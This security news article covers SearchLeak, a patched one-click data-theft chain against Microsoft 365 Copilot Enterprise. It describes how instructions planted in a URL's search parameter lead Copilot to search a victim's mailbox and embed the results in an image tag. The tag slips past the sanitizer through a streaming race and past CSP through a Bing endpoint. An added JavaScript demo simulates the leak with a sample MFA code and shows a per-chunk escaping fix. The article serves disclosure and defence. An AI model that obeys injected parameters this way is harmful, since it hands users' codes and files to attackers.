Microsoft patched a critical vulnerability in Microsoft 365 (M365) Copilot Enterprise on June 4 that let an attacker steal multi-factor authentication (MFA) codes, emails, calendar data, and organizational files with a single click on a legitimate Microsoft URL.
Varonis Threat Labs researcher Dolev Taler, credited in Microsoft’s CVE-2026-42824 advisory, named the chain SearchLeak. It links a Parameter-to-Prompt (P2P) injection with an HTML rendering race condition and a Content Security Policy (CSP) bypass via Bing server-side request forgery (SSRF).
A crafted URL plants instructions inside the Copilot Enterprise Search query parameter. Copilot reads them as commands, searches the target’s mailbox or files, and embeds the results in an image tag.
“To exfiltrate the data, an attacker crafts a URL that tells Copilot to search the user’s emails, extract the title, and embed it in an image URL,” Taler wrote.
Copilot’s sanitizer wraps the finished response in a code block only after generation ends, but the browser renders the incoming stream as it arrives, so the injected image tag triggers a request before the sanitizer ever runs. CSP would normally block an image fetch to an attacker-controlled host, so the chain points the tag at Bing’s CSP-allowlisted “Search by Image” endpoint, which fetches the URL it is handed server-side (the SSRF), with the stolen data encoded in the path.
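The parameter-to-prompt step, the rendering race and the allowlisted-origin bypass described in the two paragraphs above, modelled as an added JavaScript example (Node, no dependencies). This is not code from Varonis, Microsoft or the original article. The chunk boundaries, the sample secret, the one-entry CSP allowlist and the `/images/sbi/` path on www.bing.com are constructed assumptions, not the real endpoint; the point it shows is that a sanitizer applied to the completed response cannot retract a request the browser already issued, while escaping each chunk before it reaches the DOM leaves nothing to fetch.

```javascript
// Added example, not code from Varonis, Microsoft or the article: a toy model
// of a chat client that renders streamed HTML live, showing why a sanitizer
// that runs only after generation completes loses the race to the browser.
// The allowlist, the bing.com path, chunk boundaries and the secret are
// constructed assumptions for illustration.

// Assumed CSP img-src allowlist, origins only. A real CSP source expression
// matches scheme/host and at most a path prefix; attacker data placed after
// that prefix is never inspected.
const CSP_IMG_SRC = ["https://www.bing.com"];

function cspAllowsImage(url, allowlist = CSP_IMG_SRC) {
  return allowlist.includes(new URL(url).origin);
}

function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Complete <img src="..."> tags present in the rendered buffer. A tag split
// across chunks does not match until its closing '>' has arrived.
function imageSources(html) {
  const out = [];
  const re = /<img\s+[^>]*src="([^"]+)"[^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// The mitigation the article describes: wrap the *finished* response in a
// code block. It only ever sees the completed text.
function sanitizeAfterGeneration(fullText) {
  return "<pre><code>" + escapeHtml(fullText) + "</code></pre>";
}

// Streamed reply a model would produce after obeying instructions smuggled in
// through a query parameter: prose, then an image tag pointing at an
// allowlisted origin with the exfiltrated text URL-encoded into the path.
// (Constructed sample; chunk boundaries are arbitrary.)
function injectedReplyChunks(secret) {
  const encoded = encodeURIComponent(secret);
  return [
    "Here is the subject of your latest email: ",
    '<img src="https://www.bing.com',
    "/images/sbi/" + encoded + '">',
    " Let me know if you need anything else.",
  ];
}

// Client that appends each chunk to the DOM as it arrives. Returns the image
// requests the browser would issue (after the CSP check). sanitizeChunk runs
// on every chunk before it reaches the DOM; postSanitizer runs once at the end.
function renderStream(chunks, { sanitizeChunk = (c) => c, postSanitizer = null } = {}) {
  let dom = "";
  const requests = new Set();
  for (const chunk of chunks) {
    dom += sanitizeChunk(chunk);
    // The browser fetches an image the moment its tag is complete in the DOM.
    for (const src of imageSources(dom)) {
      if (cspAllowsImage(src)) requests.add(src);
    }
  }
  // Replacing the DOM now does not recall a request already on the wire.
  if (postSanitizer) dom = postSanitizer(chunks.join(""));
  return { dom, requests: [...requests] };
}

const SECRET = "Your MFA code is 482913"; // constructed sample mailbox subject

// Post-hoc sanitizer: the exfil request still goes out, to an allowed origin.
const raced = renderStream(injectedReplyChunks(SECRET), { postSanitizer: sanitizeAfterGeneration });
// Per-chunk escaping: no <img> tag ever exists in the DOM, so nothing is fetched.
const hardened = renderStream(injectedReplyChunks(SECRET), { sanitizeChunk: escapeHtml });

console.log("post-hoc sanitizer, requests issued:", raced.requests);
console.log("per-chunk escaping, requests issued:", hardened.requests);
```

Run with `node` and compare the two lines: the post-hoc variant reports one request to www.bing.com carrying the encoded secret even though its final DOM is a harmless code block, and the per-chunk variant reports none. The CSP check passing on the first case is the bypass in miniature: the allowlist sees only the origin, never the data in the path.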
MFA codes and password-reset links carry the highest exposure, with account takeover possible before they expire. The attack inherits the victim’s Microsoft Graph permissions, reaching SharePoint documents, OneDrive files, and calendar data across the organization.
Microsoft’s own Common Vulnerability Scoring System (CVSS) 3.1 submission scored CVE-2026-42824 at 6.5, below the 7.5 the National Vulnerability Database (NVD) assigned and below the critical rating Microsoft applied internally. Tenant administrators had no patch to apply. Microsoft resolved the flaw on its backend.
SearchLeak is the third Copilot exfiltration chain disclosed in little more than a year that needs at most one click, following Varonis’s own Reprompt against Copilot Personal in January 2026 and Aim Security’s zero-click EchoLeak in 2025. Each broke through a higher-tier deployment. Varonis confirmed no in-the-wild exploitation.